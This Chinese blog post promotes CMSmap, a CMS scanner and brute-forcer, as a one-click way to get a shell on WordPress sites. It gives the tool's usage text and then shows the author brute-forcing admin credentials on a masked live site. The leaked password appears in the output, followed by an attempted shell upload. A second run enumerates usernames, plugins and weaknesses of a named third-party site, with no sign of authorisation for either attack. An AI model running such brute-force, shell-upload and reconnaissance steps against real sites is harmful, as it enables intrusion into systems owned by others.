cmsmap渗透测试工具


Jun 17 2015

cmsmap渗透测试工具

首页 » 神器下载 » cmsmap渗透测试工具   


关于CMSmap的介绍我就不多说了,反正我告诉你可以直接对 WordPress, Joomla 以及 Drupal.一键getshell。

下载并使用

➜  soft  git clone https://github.com/Dionach/CMSmap.git ➜  CMSmap git:(master) python cmsmap.py
CMSmap tool v0.6 - Simple CMS Scanner
Author: Mike Manzotti mike.manzotti@dionach.com
Usage: cmsmap.py -t <URL>
Targets:
     -t, --target    target URL (e.g. 'https://example.com:8080/')
     -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal
     -F, --fullscan  full scan using large plugin lists. False positives and slow!
     -a, --agent     set custom user-agent
     -T, --threads   number of threads (Default: 5)
     -i, --input     scan multiple targets listed in a given text file
     -o, --output    save output in a file
     --noedb         enumerate plugins without searching exploits

Brute-Force:
     -u, --usr       username or file 
     -p, --psw       password or file
     --noxmlrpc      brute forcing WordPress without XML-RPC

Post Exploitation:
     -k, --crack     password hashes file (Require hashcat installed. For WordPress and Joomla only)
     -w, --wordlist  wordlist file

Others:
     -v, --verbose   verbose mode (Default: false)
     -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules, (A)ll
     -h, --help      show this help

Examples:
     cmsmap.py -t https://example.com cmsmap.py -t https://example.com -f W -F --noedb cmsmap.py -t https://example.com -i targets.txt -o output.txt cmsmap.py -t https://example.com -u admin -p passwords.txt cmsmap.py -k hashes.txt -w passwords.txt

从上面的使用说明可以看出来,这是可以支持多线程暴力破解的。

实践一下

为了保护隐私,我还是打个马赛克吧

➜  CMSmap git:(master) ✗ python cmsmap.py -t http://www.****.org/ -u admin -p pass.txt
[-] Date & Time: 15/06/2015 22:36:24
[-] Wordpress Brute Forcing Attack Started
[H] Valid Credentials: admin qwerasdf
[H] Valid credentials: admin qwerasdf . Do you want to try uploading a shell?
[-] (If you are not admin, you won't be able to)
[y/N]: y
[-] Logging in to the target website as admin:qwerasdf
[ERROR] Unable to upload a shell. Probably you are not an admin.
[-] Date & Time: 15/06/2015 22:38:59
[-] Completed in: 0:02:35

可以看到这个case是可以爆破,但是不能getshell,因为不是管理员权限的账号。

指纹识别扫描

➜  CMSmap git:(master) ✗ python cmsmap.py -t http://www.jobbole.com/ -f W [-] Date & Time: 15/06/2015 22:58:30 [-] Target: http://www.jobbole.com [M] Website Not in HTTPS: http://www.jobbole.com [I] Server: nginx
[I] X-Powered-By: PHP/5.3.3 [L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[I] X-Content-Type-Options: Not Enforced
[L] Robots.txt Found: http://www.jobbole.com/robots.txt [I] CMS Detection: Wordpress
[I] Wordpress Theme: jobboleblogv3
[-] Enumerating Wordpress Usernames via "Feed" ...
[-] Enumerating Wordpress Usernames via "Author" ...
[M] 10 [M] 11 [M] 12 [M] 13 [M] 14 [M] 16 [M] 17 [M] 18 [M] 19 [M] 4 [M] 9 [M] Carey
[M] HelloKitty
[M] Spokesman
[M] admin
[M] jobbole
[M] Website vulnerable to XML-RPC Brute Force Vulnerability
[I] Autocomplete Off Not Found: http://www.jobbole.com/wp-login.php [-] Default WordPress Files:
[I] http://www.jobbole.com/readme.html [I] http://www.jobbole.com/license.txt [I] http://www.jobbole.com/xmlrpc.php [I] http://www.jobbole.com/wp-includes/images/crystal/license.txt [I] http://www.jobbole.com/wp-includes/images/crystal/license.txt [I] http://www.jobbole.com/wp-includes/js/plupload/license.txt [I] http://www.jobbole.com/wp-includes/js/plupload/changelog.txt [I] http://www.jobbole.com/wp-includes/js/tinymce/license.txt [I] http://www.jobbole.com/wp-includes/js/tinymce/plugins/spellchecker/changelog.txt [I] http://www.jobbole.com/wp-includes/js/swfupload/license.txt [-] Searching Wordpress Plugins ...
[I] jobbole-wp-plugin
[I] mu-widgets
[I] q2w3-fixed-widget
[I] wp-connect
[I] wp-postviews
[I] akismet
[I] bbpress
[I] comment-rating
[I] login-lockdown
[I] ucan-post
[-] Searching Wordpress TimThumbs ... 6%

我感觉这个直接秒杀wpscan啊,非常的强大

来源 http://www.codefrom.com/paper/%E7%A7%92%E6%9D%80wpscan%EF%BC%81wordpress%E4%B8%80%E9%94%AEgetshell

git下载

https://github.com/BrianHeeseIs/CMSmap

如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签: 渗透测试工具 cmsmap使用 cmsmap说明

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «互联网安全品牌安全狗获IDG华软青睐 完成5000万融资 | 《安全参考》HACKCTO-201506-30»

你肿么看?

你还可以输入 250/250 个字

 微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~